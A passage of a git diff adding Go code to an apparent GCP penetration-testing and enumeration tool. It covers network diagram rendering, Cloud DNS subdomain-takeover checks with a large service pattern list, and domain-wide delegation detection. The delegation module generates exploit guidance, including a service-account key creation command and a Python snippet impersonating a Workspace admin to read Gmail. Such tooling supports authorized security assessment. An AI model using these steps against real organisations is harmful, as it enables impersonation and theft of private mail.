			strings.Repeat(" ", padding)))
	}

	// Bottom of boxes
	sb.WriteString(fmt.Sprintf("│ └%s┘ └%s┘%s│\n",
		strings.Repeat("─", frontendWidth),
		strings.Repeat("─", backendWidth),
		strings.Repeat(" ", padding)))

	sb.WriteString(DrawEmptyLine(width))

	return sb.String()
}

// drawLBSummary draws summary statistics: LB counts per scheme plus Cloud
// Armor coverage, warning when any external LB lacks an attached policy.
func drawLBSummary(externalLBs, internalLBs []LoadBalancerInfo, width int) string {
	var sb strings.Builder

	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "SUMMARY"))
	sb.WriteString("├")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┤\n")

	// Count with Cloud Armor
	armorCount := 0
	for _, lb := range externalLBs {
		if lb.SecurityPolicy != "" {
			armorCount++
		}
	}

	statsLine := fmt.Sprintf(" External LBs: %d Internal LBs: %d With Cloud Armor: %d/%d",
		len(externalLBs), len(internalLBs), armorCount, len(externalLBs))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, statsLine))

	if len(externalLBs) > 0 && armorCount == 0 {
		warningLine := " ⚠ WARNING: No external load balancers have Cloud Armor protection"
		sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, warningLine))
	} else if len(externalLBs) > armorCount {
		warningLine := fmt.Sprintf(" ⚠ WARNING: %d external load balancer(s) missing Cloud Armor", len(externalLBs)-armorCount)
		sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, warningLine))
	}

	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// truncateString truncates a string to maxLen, adding "..." if needed.
// For maxLen <= 3 the string is hard-cut with no ellipsis.
func truncateString(s string, maxLen int) string {
	if len(s) <= maxLen {
		return s
	}
	if maxLen <= 3 {
		return s[:maxLen]
	}
	return s[:maxLen-3] + "..."
}

// safeGetIndex safely gets an index from a slice, returning empty string if out of bounds
func safeGetIndex(slice []string, index int) string {
	if index < len(slice) {
		return slice[index]
	}
	return ""
}

// DrawLoadBalancerLegend draws the load balancer diagram legend
func DrawLoadBalancerLegend(width int) string {
	var sb strings.Builder

	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND"))
	sb.WriteString("├")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┤\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[Cloud Armor] = WAF/DDoS protection enabled"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "EXTERNAL = Internet-facing load balancer"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "INTERNAL = Private/VPC-only load balancer"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "global = Global anycast load balancer"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "regional = Region-specific load balancer"))
	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// ========================================
// VPC Networks Diagram Functions
// ========================================

// DrawVPCNetworksDiagram generates a compact VPC networks overview diagram:
// one compact box per network, an optional peering summary, and a legend.
func DrawVPCNetworksDiagram(
	networks []NetworkInfo,
	subnetsByNetwork map[string][]SubnetInfo,
	peerings []VPCPeeringInfo,
	projectID string,
	width int,
) string {
	var sb strings.Builder

	title := "VPC NETWORKS OVERVIEW"
	if projectID != "" {
		title = fmt.Sprintf("VPC NETWORKS OVERVIEW (Project: %s)", projectID)
	}

	sb.WriteString(DrawBox(title, width))
	sb.WriteString("\n")

	// Draw each network
	for _, network := range networks {
		sb.WriteString(drawVPCNetworkCompact(network, subnetsByNetwork, width))
		sb.WriteString("\n")
	}

	// Peering summary
	if len(peerings) > 0 {
		sb.WriteString(drawVPCPeeringsCompact(peerings, width))
		sb.WriteString("\n")
	}

	// Legend
	sb.WriteString(DrawVPCNetworkLegend(width))

	return sb.String()
}

// drawVPCNetworkCompact renders a one-box-per-network summary: a badge-
// decorated title line, then each region's subnets as single indented lines
// with PGA / Logs flags.
func drawVPCNetworkCompact(network NetworkInfo, subnetsByNetwork map[string][]SubnetInfo, width int) string {
	var sb strings.Builder

	// Network header
	sharedLabel := ""
	if network.IsSharedVPC {
		sharedLabel = fmt.Sprintf(" [SHARED VPC %s]", strings.ToUpper(network.SharedVPCRole))
	}
	peeringLabel := ""
	if network.PeeringCount > 0 {
		peeringLabel = fmt.Sprintf(" [%d peerings]", network.PeeringCount)
	}

	title := fmt.Sprintf("VPC: %s (%s routing)%s%s", network.Name, network.RoutingMode, sharedLabel, peeringLabel)

	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	if len(title) > width-4 {
		title = title[:width-7] + "..."
+ } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Get subnets + key := network.ProjectID + "/" + network.Name + subnets := subnetsByNetwork[key] + + if len(subnets) == 0 { + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, " (No subnets)")) + } else { + // Group by region + byRegion := make(map[string][]SubnetInfo) + for _, s := range subnets { + byRegion[s.Region] = append(byRegion[s.Region], s) + } + + var regions []string + for r := range byRegion { + regions = append(regions, r) + } + sort.Strings(regions) + + for _, region := range regions { + regionSubnets := byRegion[region] + regionLine := fmt.Sprintf(" 📍 %s:", region) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, regionLine)) + + for _, s := range regionSubnets { + pga := "-" + if s.PrivateIPGoogleAccess { + pga = "PGA" + } + logs := "-" + if s.FlowLogsEnabled { + logs = "Logs" + } + subnetLine := fmt.Sprintf(" %s (%s) [%s][%s]", s.Name, s.IPCIDRRange, pga, logs) + if len(subnetLine) > width-4 { + subnetLine = subnetLine[:width-7] + "..." 
+ } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, subnetLine)) + } + } + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +func drawVPCPeeringsCompact(peerings []VPCPeeringInfo, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "VPC PEERINGS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for _, p := range peerings { + networkName := extractNetworkNameFromURL(p.Network) + peerNetworkName := extractNetworkNameFromURL(p.PeerNetwork) + routes := "" + if p.ExportRoutes && p.ImportRoutes { + routes = " [↔ routes]" + } else if p.ExportRoutes { + routes = " [→ export]" + } else if p.ImportRoutes { + routes = " [← import]" + } + line := fmt.Sprintf(" %s ←→ %s (%s)%s", networkName, peerNetworkName, p.State, routes) + if len(line) > width-4 { + line = line[:width-7] + "..." 
+ } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line)) + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawVPCNetworkLegend draws the VPC network diagram legend +func DrawVPCNetworkLegend(width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "PGA = Private Google Access enabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Logs = VPC Flow Logs enabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "←→ = VPC Peering connection")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "📍 = Region location")) + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// ======================================== +// Helper Functions +// ======================================== + +// extractNetworkNameFromURL extracts network name from full URL +func extractNetworkNameFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +// max returns the maximum of two integers +func max(a, b int) int { + if a > b { + return a + } + return b +} diff --git a/gcp/services/dnsService/dnsService.go b/gcp/services/dnsService/dnsService.go new file mode 100644 index 00000000..c91397cd --- /dev/null +++ b/gcp/services/dnsService/dnsService.go @@ -0,0 +1,363 @@ +package dnsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + dns "google.golang.org/api/dns/v1" +) + +type DNSService struct{ + session *gcpinternal.SafeSession +} + +func New() 
*DNSService { + return &DNSService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DNSService { + return &DNSService{ + session: session, + } +} + +// ZoneInfo holds Cloud DNS managed zone details +type ZoneInfo struct { + Name string + ProjectID string + DNSName string // The DNS name (e.g., example.com.) + Description string + Visibility string // public or private + CreationTime string + + // DNSSEC configuration + DNSSECState string // on, off, transfer + DNSSECKeyType string + + // Private zone configuration + PrivateNetworks []string // VPC networks for private zones + + // Peering configuration + PeeringNetwork string + PeeringTargetProject string + + // Forwarding configuration + ForwardingTargets []string + + // Record count + RecordCount int64 + + // IAM bindings + IAMBindings []IAMBinding +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// RecordInfo holds DNS record details +type RecordInfo struct { + Name string + ProjectID string + ZoneName string + Type string // A, AAAA, CNAME, MX, TXT, etc. + TTL int64 + RRDatas []string // Record data +} + +// TakeoverRisk represents a potential subdomain takeover vulnerability +type TakeoverRisk struct { + RecordName string + RecordType string + Target string + Service string // AWS S3, Azure, GitHub Pages, etc. 
+ RiskLevel string // HIGH, MEDIUM, LOW + Description string + Verification string // How to verify the takeover +} + +// takeoverPatterns maps CNAME/A record patterns to potential takeover services +var takeoverPatterns = map[string]struct { + Service string + RiskLevel string + Description string +}{ + // AWS + ".s3.amazonaws.com": {"AWS S3", "HIGH", "S3 bucket may be unclaimed - check for 'NoSuchBucket' error"}, + ".s3-website": {"AWS S3 Website", "HIGH", "S3 website bucket may be unclaimed"}, + ".elasticbeanstalk.com": {"AWS Elastic Beanstalk", "HIGH", "Elastic Beanstalk environment may be deleted"}, + ".cloudfront.net": {"AWS CloudFront", "MEDIUM", "CloudFront distribution may be unconfigured"}, + // Azure + ".azurewebsites.net": {"Azure App Service", "HIGH", "Azure web app may be deleted"}, + ".cloudapp.azure.com": {"Azure Cloud App", "HIGH", "Azure cloud app may be deleted"}, + ".cloudapp.net": {"Azure Cloud Service", "HIGH", "Azure cloud service may be deleted"}, + ".blob.core.windows.net": {"Azure Blob Storage", "HIGH", "Azure blob container may be deleted"}, + ".azure-api.net": {"Azure API Management", "MEDIUM", "Azure API may be deleted"}, + ".azureedge.net": {"Azure CDN", "MEDIUM", "Azure CDN endpoint may be deleted"}, + ".trafficmanager.net": {"Azure Traffic Manager", "HIGH", "Traffic Manager profile may be deleted"}, + // Google Cloud + ".storage.googleapis.com": {"GCP Cloud Storage", "HIGH", "GCS bucket may be deleted"}, + ".appspot.com": {"GCP App Engine", "MEDIUM", "App Engine app may be deleted"}, + ".run.app": {"GCP Cloud Run", "LOW", "Cloud Run service (usually protected)"}, + ".cloudfunctions.net": {"GCP Cloud Functions", "LOW", "Cloud Function (usually protected)"}, + // GitHub + ".github.io": {"GitHub Pages", "HIGH", "GitHub Pages repo may be deleted"}, + ".githubusercontent.com": {"GitHub", "MEDIUM", "GitHub resource may be deleted"}, + // Heroku + ".herokuapp.com": {"Heroku", "HIGH", "Heroku app may be deleted"}, + ".herokudns.com": 
{"Heroku DNS", "HIGH", "Heroku DNS may be unconfigured"}, + // Other services + ".pantheonsite.io": {"Pantheon", "HIGH", "Pantheon site may be deleted"}, + ".netlify.app": {"Netlify", "MEDIUM", "Netlify site may be deleted"}, + ".netlify.com": {"Netlify", "MEDIUM", "Netlify site may be deleted"}, + ".vercel.app": {"Vercel", "MEDIUM", "Vercel deployment may be deleted"}, + ".now.sh": {"Vercel (Now)", "MEDIUM", "Vercel deployment may be deleted"}, + ".surge.sh": {"Surge.sh", "HIGH", "Surge project may be deleted"}, + ".bitbucket.io": {"Bitbucket", "HIGH", "Bitbucket repo may be deleted"}, + ".ghost.io": {"Ghost", "HIGH", "Ghost blog may be deleted"}, + ".helpjuice.com": {"Helpjuice", "HIGH", "Helpjuice site may be deleted"}, + ".helpscoutdocs.com": {"HelpScout", "HIGH", "HelpScout docs may be deleted"}, + ".zendesk.com": {"Zendesk", "MEDIUM", "Zendesk may be unconfigured"}, + ".teamwork.com": {"Teamwork", "HIGH", "Teamwork site may be deleted"}, + ".cargocollective.com": {"Cargo", "HIGH", "Cargo site may be deleted"}, + ".feedpress.me": {"Feedpress", "HIGH", "Feedpress feed may be deleted"}, + ".freshdesk.com": {"Freshdesk", "MEDIUM", "Freshdesk may be unconfigured"}, + ".readme.io": {"ReadMe", "HIGH", "ReadMe docs may be deleted"}, + ".statuspage.io": {"Statuspage", "HIGH", "Statuspage may be deleted"}, + ".smugmug.com": {"SmugMug", "HIGH", "SmugMug may be deleted"}, + ".strikingly.com": {"Strikingly", "HIGH", "Strikingly site may be deleted"}, + ".tilda.ws": {"Tilda", "HIGH", "Tilda site may be deleted"}, + ".tumblr.com": {"Tumblr", "HIGH", "Tumblr blog may be deleted"}, + ".unbounce.com": {"Unbounce", "HIGH", "Unbounce page may be deleted"}, + ".webflow.io": {"Webflow", "HIGH", "Webflow site may be deleted"}, + ".wordpress.com": {"WordPress.com", "MEDIUM", "WordPress site may be deleted"}, + ".wpengine.com": {"WP Engine", "HIGH", "WP Engine site may be deleted"}, + ".desk.com": {"Desk.com", "HIGH", "Desk.com may be deleted"}, + ".myshopify.com": {"Shopify", 
"HIGH", "Shopify store may be deleted"}, + ".launchrock.com": {"LaunchRock", "HIGH", "LaunchRock page may be deleted"}, + ".pingdom.com": {"Pingdom", "MEDIUM", "Pingdom may be unconfigured"}, + ".tictail.com": {"Tictail", "HIGH", "Tictail store may be deleted"}, + ".campaignmonitor.com": {"Campaign Monitor", "HIGH", "Campaign Monitor may be deleted"}, + ".canny.io": {"Canny", "HIGH", "Canny may be deleted"}, + ".getresponse.com": {"GetResponse", "HIGH", "GetResponse may be deleted"}, + ".airee.ru": {"Airee", "HIGH", "Airee may be deleted"}, + ".thinkific.com": {"Thinkific", "HIGH", "Thinkific may be deleted"}, + ".agilecrm.com": {"Agile CRM", "HIGH", "Agile CRM may be deleted"}, + ".aha.io": {"Aha!", "HIGH", "Aha! may be deleted"}, + ".animaapp.io": {"Anima", "HIGH", "Anima may be deleted"}, + ".proposify.com": {"Proposify", "HIGH", "Proposify may be deleted"}, +} + +// getService returns a DNS service client using cached session if available +func (ds *DNSService) getService(ctx context.Context) (*dns.Service, error) { + if ds.session != nil { + return sdk.CachedGetDNSService(ctx, ds.session) + } + return dns.NewService(ctx) +} + +// Zones retrieves all DNS managed zones in a project +func (ds *DNSService) Zones(projectID string) ([]ZoneInfo, error) { + ctx := context.Background() + + service, err := ds.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + var zones []ZoneInfo + + call := service.ManagedZones.List(projectID) + err = call.Pages(ctx, func(page *dns.ManagedZonesListResponse) error { + for _, zone := range page.ManagedZones { + info := parseZoneInfo(zone, projectID) + // Get IAM bindings for the zone + info.IAMBindings = ds.getZoneIAMBindings(service, ctx, projectID, zone.Name) + zones = append(zones, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + return zones, nil +} + +// Records retrieves all DNS records in a zone +func 
(ds *DNSService) Records(projectID, zoneName string) ([]RecordInfo, error) { + ctx := context.Background() + + service, err := ds.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + var records []RecordInfo + + call := service.ResourceRecordSets.List(projectID, zoneName) + err = call.Pages(ctx, func(page *dns.ResourceRecordSetsListResponse) error { + for _, rrset := range page.Rrsets { + info := RecordInfo{ + Name: rrset.Name, + ProjectID: projectID, + ZoneName: zoneName, + Type: rrset.Type, + TTL: rrset.Ttl, + RRDatas: rrset.Rrdatas, + } + records = append(records, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + return records, nil +} + +// parseZoneInfo extracts relevant information from a DNS managed zone +func parseZoneInfo(zone *dns.ManagedZone, projectID string) ZoneInfo { + info := ZoneInfo{ + Name: zone.Name, + ProjectID: projectID, + DNSName: zone.DnsName, + Description: zone.Description, + Visibility: zone.Visibility, + CreationTime: zone.CreationTime, + } + + // DNSSEC configuration + if zone.DnssecConfig != nil { + info.DNSSECState = zone.DnssecConfig.State + if len(zone.DnssecConfig.DefaultKeySpecs) > 0 { + info.DNSSECKeyType = zone.DnssecConfig.DefaultKeySpecs[0].Algorithm + } + } + + // Private zone configuration + if zone.PrivateVisibilityConfig != nil { + for _, network := range zone.PrivateVisibilityConfig.Networks { + info.PrivateNetworks = append(info.PrivateNetworks, extractNetworkName(network.NetworkUrl)) + } + } + + // Peering configuration + if zone.PeeringConfig != nil && zone.PeeringConfig.TargetNetwork != nil { + info.PeeringNetwork = extractNetworkName(zone.PeeringConfig.TargetNetwork.NetworkUrl) + // Extract project from network URL + if strings.Contains(zone.PeeringConfig.TargetNetwork.NetworkUrl, "/projects/") { + parts := strings.Split(zone.PeeringConfig.TargetNetwork.NetworkUrl, "/") + for i, part := 
range parts { + if part == "projects" && i+1 < len(parts) { + info.PeeringTargetProject = parts[i+1] + break + } + } + } + } + + // Forwarding configuration + if zone.ForwardingConfig != nil { + for _, target := range zone.ForwardingConfig.TargetNameServers { + info.ForwardingTargets = append(info.ForwardingTargets, target.Ipv4Address) + } + } + + return info +} + +// extractNetworkName extracts the network name from a network URL +func extractNetworkName(networkURL string) string { + // Format: https://www.googleapis.com/compute/v1/projects/PROJECT/global/networks/NETWORK + parts := strings.Split(networkURL, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return networkURL +} + +// CheckTakeoverRisks analyzes DNS records for potential subdomain takeover vulnerabilities +func (ds *DNSService) CheckTakeoverRisks(records []RecordInfo) []TakeoverRisk { + var risks []TakeoverRisk + + for _, record := range records { + // Only check CNAME records (primary takeover vector) + if record.Type != "CNAME" { + continue + } + + for _, target := range record.RRDatas { + targetLower := strings.ToLower(target) + + // Check against known vulnerable patterns + for pattern, info := range takeoverPatterns { + if strings.Contains(targetLower, pattern) { + risk := TakeoverRisk{ + RecordName: record.Name, + RecordType: record.Type, + Target: target, + Service: info.Service, + RiskLevel: info.RiskLevel, + Description: info.Description, + Verification: generateVerificationCommand(record.Name, target, info.Service), + } + risks = append(risks, risk) + break // Only match first pattern + } + } + } + } + + return risks +} + +// generateVerificationCommand creates a command to verify if takeover is possible +func generateVerificationCommand(recordName, target, service string) string { + // Remove trailing dot from DNS names + name := strings.TrimSuffix(recordName, ".") + + switch { + case strings.Contains(service, "S3"): + return fmt.Sprintf("curl -sI http://%s | head -5 # Look 
for 'NoSuchBucket'", name) + case strings.Contains(service, "Azure"): + return fmt.Sprintf("curl -sI https://%s | head -5 # Look for 'NXDOMAIN' or error page", name) + case strings.Contains(service, "GitHub"): + return fmt.Sprintf("curl -sI https://%s | head -5 # Look for '404' or 'no GitHub Pages'", name) + case strings.Contains(service, "Heroku"): + return fmt.Sprintf("curl -sI https://%s | head -5 # Look for 'no such app'", name) + default: + return fmt.Sprintf("dig %s && curl -sI https://%s | head -5", name, name) + } +} + +// getZoneIAMBindings retrieves IAM bindings for a DNS managed zone +func (ds *DNSService) getZoneIAMBindings(service *dns.Service, ctx context.Context, projectID, zoneName string) []IAMBinding { + var bindings []IAMBinding + + resource := "projects/" + projectID + "/managedZones/" + zoneName + policy, err := service.ManagedZones.GetIamPolicy(resource, &dns.GoogleIamV1GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // Return empty bindings if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} diff --git a/gcp/services/domainWideDelegationService/domainWideDelegationService.go b/gcp/services/domainWideDelegationService/domainWideDelegationService.go new file mode 100644 index 00000000..922a1381 --- /dev/null +++ b/gcp/services/domainWideDelegationService/domainWideDelegationService.go @@ -0,0 +1,264 @@ +package domainwidedelegationservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + iam "google.golang.org/api/iam/v1" +) + +type DomainWideDelegationService struct{ + session *gcpinternal.SafeSession +} + +func New() *DomainWideDelegationService { + return &DomainWideDelegationService{} +} + +func NewWithSession(session 
*gcpinternal.SafeSession) *DomainWideDelegationService { + return &DomainWideDelegationService{ + session: session, + } +} + +// DWDServiceAccount represents a service account with domain-wide delegation +type DWDServiceAccount struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + UniqueID string `json:"uniqueId"` + DisplayName string `json:"displayName"` + OAuth2ClientID string `json:"oauth2ClientId"` + DWDEnabled bool `json:"dwdEnabled"` + Keys []KeyInfo `json:"keys"` + Description string `json:"description"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` + WorkspaceScopes []string `json:"workspaceScopes"` // Common Workspace scopes to try +} + +// KeyInfo represents a service account key +type KeyInfo struct { + KeyID string `json:"keyId"` + CreatedAt string `json:"createdAt"` + ExpiresAt string `json:"expiresAt"` + KeyAlgorithm string `json:"keyAlgorithm"` + KeyType string `json:"keyType"` +} + +// Common Google Workspace OAuth scopes that DWD service accounts might have +var CommonWorkspaceScopes = []string{ + "https://www.googleapis.com/auth/gmail.readonly", + "https://www.googleapis.com/auth/gmail.send", + "https://www.googleapis.com/auth/gmail.modify", + "https://www.googleapis.com/auth/drive", + "https://www.googleapis.com/auth/drive.readonly", + "https://www.googleapis.com/auth/calendar", + "https://www.googleapis.com/auth/calendar.readonly", + "https://www.googleapis.com/auth/admin.directory.user.readonly", + "https://www.googleapis.com/auth/admin.directory.group.readonly", + "https://www.googleapis.com/auth/spreadsheets", + "https://www.googleapis.com/auth/contacts.readonly", + "https://mail.google.com/", +} + +// getIAMService returns an IAM service client using cached session if available +func (s *DomainWideDelegationService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return 
sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + +// GetDWDServiceAccounts finds service accounts that may have domain-wide delegation +func (s *DomainWideDelegationService) GetDWDServiceAccounts(projectID string) ([]DWDServiceAccount, error) { + ctx := context.Background() + service, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var dwdAccounts []DWDServiceAccount + + // List all service accounts + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := service.Projects.ServiceAccounts.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + for _, sa := range resp.Accounts { + // Check if the service account has an OAuth2 client ID (required for DWD) + // The OAuth2ClientId field is populated when DWD is enabled + dwdEnabled := sa.Oauth2ClientId != "" + + account := DWDServiceAccount{ + Email: sa.Email, + ProjectID: projectID, + UniqueID: sa.UniqueId, + DisplayName: sa.DisplayName, + OAuth2ClientID: sa.Oauth2ClientId, + DWDEnabled: dwdEnabled, + Description: sa.Description, + Keys: []KeyInfo{}, + RiskReasons: []string{}, + ExploitCommands: []string{}, + WorkspaceScopes: CommonWorkspaceScopes, + } + + // Check for keys + keysResp, err := service.Projects.ServiceAccounts.Keys.List( + fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, sa.Email), + ).Context(ctx).Do() + if err == nil { + // Collect user-managed keys (not system-managed) + for _, key := range keysResp.Keys { + if key.KeyType == "USER_MANAGED" { + // Extract key ID from full name (projects/.../keys/KEY_ID) + keyID := key.Name + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + account.Keys = append(account.Keys, KeyInfo{ + KeyID: keyID, + CreatedAt: key.ValidAfterTime, + ExpiresAt: key.ValidBeforeTime, + KeyAlgorithm: key.KeyAlgorithm, + KeyType: key.KeyType, + }) + } + } + } + 
+ // Analyze risk + account.RiskLevel, account.RiskReasons = s.analyzeRisk(account) + + // Generate exploit commands + account.ExploitCommands = s.generateExploitCommands(account) + + // Only include accounts with DWD or that look like they might be used for it + if dwdEnabled || s.looksLikeDWDAccount(account) { + dwdAccounts = append(dwdAccounts, account) + } + } + + return dwdAccounts, nil +} + +// looksLikeDWDAccount checks if a service account might be used for DWD based on naming +func (s *DomainWideDelegationService) looksLikeDWDAccount(account DWDServiceAccount) bool { + emailLower := strings.ToLower(account.Email) + descLower := strings.ToLower(account.Description) + nameLower := strings.ToLower(account.DisplayName) + + // Common naming patterns for DWD service accounts + dwdPatterns := []string{ + "delegation", "dwd", "workspace", "gsuite", "admin", + "gmail", "drive", "calendar", "directory", "impersonat", + } + + for _, pattern := range dwdPatterns { + if strings.Contains(emailLower, pattern) || + strings.Contains(descLower, pattern) || + strings.Contains(nameLower, pattern) { + return true + } + } + + return false +} + +func (s *DomainWideDelegationService) analyzeRisk(account DWDServiceAccount) (string, []string) { + var reasons []string + score := 0 + + if account.DWDEnabled { + reasons = append(reasons, "Domain-wide delegation ENABLED (OAuth2 Client ID present)") + score += 3 + } + + hasKeys := len(account.Keys) > 0 + if hasKeys { + reasons = append(reasons, fmt.Sprintf("Has %d user-managed key(s) - can be used for impersonation", len(account.Keys))) + score += 2 + } + + if account.DWDEnabled && hasKeys { + reasons = append(reasons, "CRITICAL: DWD enabled + keys exist = can impersonate any Workspace user!") + score += 2 + } + + // Check for suspicious naming + if s.looksLikeDWDAccount(account) && !account.DWDEnabled { + reasons = append(reasons, "Name suggests DWD purpose but OAuth2 Client ID not detected") + score += 1 + } + + if score >= 5 { + 
return "CRITICAL", reasons
+	} else if score >= 3 {
+		return "HIGH", reasons
+	} else if score >= 2 {
+		return "MEDIUM", reasons
+	} else if score >= 1 {
+		return "LOW", reasons
+	}
+	return "INFO", reasons
+}
+
+func (s *DomainWideDelegationService) generateExploitCommands(account DWDServiceAccount) []string {
+	var commands []string
+
+	if !account.DWDEnabled {
+		commands = append(commands,
+			"# DWD not confirmed - OAuth2 Client ID not present",
+			"# Check Google Admin Console: Security > API Controls > Domain-wide Delegation",
+		)
+		return commands
+	}
+
+	commands = append(commands,
+		fmt.Sprintf("# Domain-Wide Delegation Service Account: %s", account.Email),
+		fmt.Sprintf("# OAuth2 Client ID: %s", account.OAuth2ClientID),
+		"",
+		"# To exploit DWD, you need:",
+		"# 1. A key file for this service account",
+		"# 2. The email of a Workspace user to impersonate",
+		"# 3. Knowledge of which scopes are authorized in Admin Console",
+		"",
+	)
+
+	if len(account.Keys) > 0 {
+		commands = append(commands,
+			"# Create a new key (if you have iam.serviceAccountKeys.create permission):",
+			fmt.Sprintf("gcloud iam service-accounts keys create /tmp/key.json --iam-account=%s", account.Email),
+			"",
+		)
+	}
+
+	commands = append(commands,
+		"# Python exploit example:",
+		"# from google.oauth2 import service_account",
+		"# from googleapiclient.discovery import build",
+		"#",
+		"# creds = service_account.Credentials.from_service_account_file(",
+		"#     'key.json',",
+		"#     scopes=['https://www.googleapis.com/auth/gmail.readonly'],",
+		"#     subject='admin@yourdomain.com'  # User to impersonate",
+		"# )",
+		"#",
+		"# gmail = build('gmail', 'v1', credentials=creds)",
+		"# messages = gmail.users().messages().list(userId='me').execute()",
+		"",
+		"# Common scopes to test (must be authorized in Admin Console):",
+	)
+
+	for _, scope := range CommonWorkspaceScopes[:5] { // First 5 most useful scopes
+		commands = append(commands, fmt.Sprintf("# - %s", scope))
+	}
+
+	return commands
+} diff --git a/gcp/services/filestoreService/filestoreService.go b/gcp/services/filestoreService/filestoreService.go new file mode 100644 index 00000000..1ed75c42 --- /dev/null +++ b/gcp/services/filestoreService/filestoreService.go @@ -0,0 +1,136 @@ +package filestoreservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + file "google.golang.org/api/file/v1" +) + +type FilestoreService struct { + session *gcpinternal.SafeSession +} + +func New() *FilestoreService { + return &FilestoreService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *FilestoreService { + return &FilestoreService{ + session: session, + } +} + +type FilestoreInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Tier string `json:"tier"` + State string `json:"state"` + Network string `json:"network"` + IPAddresses []string `json:"ipAddresses"` + Shares []ShareInfo `json:"shares"` + CreateTime string `json:"createTime"` + Protocol string `json:"protocol"` // NFS_V3, NFS_V4_1 +} + +type ShareInfo struct { + Name string `json:"name"` + CapacityGB int64 `json:"capacityGb"` + NfsExportOptions []NfsExportOption `json:"nfsExportOptions"` +} + +type NfsExportOption struct { + IPRanges []string `json:"ipRanges"` + AccessMode string `json:"accessMode"` // READ_ONLY, READ_WRITE + SquashMode string `json:"squashMode"` // NO_ROOT_SQUASH, 